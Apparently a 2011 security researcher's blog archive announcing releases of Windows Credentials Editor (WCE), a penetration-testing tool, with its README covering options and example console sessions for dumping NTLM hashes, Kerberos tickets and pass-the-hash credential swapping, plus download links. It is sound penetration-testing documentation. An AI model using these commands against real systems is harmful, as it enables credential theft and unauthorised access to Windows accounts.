Tuesday, August 23, 2011

WCE v1.2 64-bit version released


You can find the 64-bit version of WCE v1.2 here

As always, all feedback is welcome, email me.


Thank you!

Wednesday, August 17, 2011

"Post-Exploitation with WCE" Presentation


This presentation describes the techniques WCE brings to penetration testers and how these can be used in different scenarios. Although originally targeted to college students studying information security, you might find useful information you didn't know about even if you are an experienced user of WCE or penetration tester.

Direct links:
Post-Exploitation with WCE (SPANISH)

Post-Exploitation with WCE (ENGLISH)

Wednesday, August 03, 2011

Windows Credentials Editor (WCE) FAQ released

I find myself answering a lot of questions about WCE and related matters all the time; for this reason I decided to create a WCE FAQ to try to provide a centralized source of information and answers to all the questions. 

You can find it here http://www.ampliasecurity.com/research/wcefaq.html

The FAQ is still work in progress and I will continue to update it regularly with new information, attack scenarios, different ways to use the features provided by the tool, etc. 

If you have a question in particular that you want answer, please don't hesitate to contact me, I'll answer you personally and also add the question and answer to the FAQ.



Monday, April 18, 2011

Windows Credentials Editor (WCE) v1.2 released

Windows Credentials Editor v1.2

New features in this version:
-g              Generate LM & NT Hash.
                Parameters: <password>.
-K              Dump Kerberos tickets to file (unix & 'windows wce' format)
-k              Read Kerberos tickets from file and insert into Windows cache

Description:
Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems.

WCE v1.2 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Dumping Kerberos tickets and adding them to the Windows cache was tested on Windows 7; your feedback is welcome.


Download:
http://www.ampliasecurity.com/research/wce_v1_2.tgz

Wednesday, March 09, 2011

RootedCON 2011 "WCE Internals" presentation available at slideshare

Check out my presentation on "WCE Internals" (based on WCEv1.1) available at slideshare (posted by RootedCON):

http://www.slideshare.net/rootedcon/hernan-ochoa-wce-internals-rootedcon-2011

I'll publish the .pdf on http://www.ampliasecurity.com/research/ next week.

You can find all the RootedCON 2011 presentations here:


http://www.slideshare.net/rootedcon/

Some presos are in Spanish and some in English.

Go check them out!

Monday, March 07, 2011

WCE v1.1 is out!

WCE v1.1 is out!

http://www.ampliasecurity.com/research/wce_v1_1.tgz

README:


Windows Credentials Editor v1.1
(c) 2010, 2011 Amplia Security, Hernan Ochoa
written by: hernan@ampliasecurity.com
http://www.ampliasecurity.com
-------------------------------------------------------------

Abstract
----------
Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes). This can be used, for example, to perform pass-the-hash on Windows and also obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used in further attacks.

WCE v1.1 supports obtaining logon sessions and NTLM credentials just by reading
memory without performing code injection.

Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008

Requirements
-------------
This tool requires administrator privileges.

Options
--------
Windows Credentials Editor provides the following options:

Options:  
    -l        List logon sessions and NTLM credentials (default).
    -s        Changes NTLM credentials of current logon session.
            Parameters: :::.
    -r        Lists logon sessions and NTLM credentials indefinitely.
            Refreshes every 5 seconds if new sessions are found.
            Optional: -r.
    -c        Run in a new session with the specified NTLM credentials.
            Parameters: .
    -e        Lists logon sessions NTLM credentials indefinitely.
            Refreshes every time a logon event occurs.
    -o        saves all output to a file.
            Parameters: .
    -i        Specify LUID instead of use current logon session.
            Parameters: .
    -d        Delete NTLM credentials from logon session.
            Parameters: .
    -a        Use Addresses.
            Parameters:
    -f        Force 'safe mode'.
    -v        verbose output.

Examples:

    * List current logon sessions

C:\>wce -l
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

meme:meme:11111111111111111111111111111111:11111111111111111111111111111111

    * List current logon sessions with verbose output enabled

C:\>wce -l -v
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
        LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
        LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
        LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
        LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
        LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
        LUID:000003E4h
\:NTLM
        LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
        LUID:000003E7h

00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111   

    * Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och
oa (hernan@ampliasecurity.com)
Use -h for help.

Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!

    * Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

NTLM credentials successfully deleted!

    * Run WCE indefinitely, waiting for new credentials/logon sessions.
    Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e

    * Run WCE indefinitely, waiting for new credentials/logon sessions
    Refresh is every 5 seconds by default.

C:\>wce -r

    * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5


GETLSASRVADDR.EXE
-----------------
This tool can be used to obtain automatically needed addresses for WCE
to be able to read logon sessions and NTLM credentials from memory.

Addresses obtained can then be used with WCE using the -A switch.

This tool requires the dlls symsrv.dll and dbghelp.dll available from the
"Debugging Tools for Windows" package.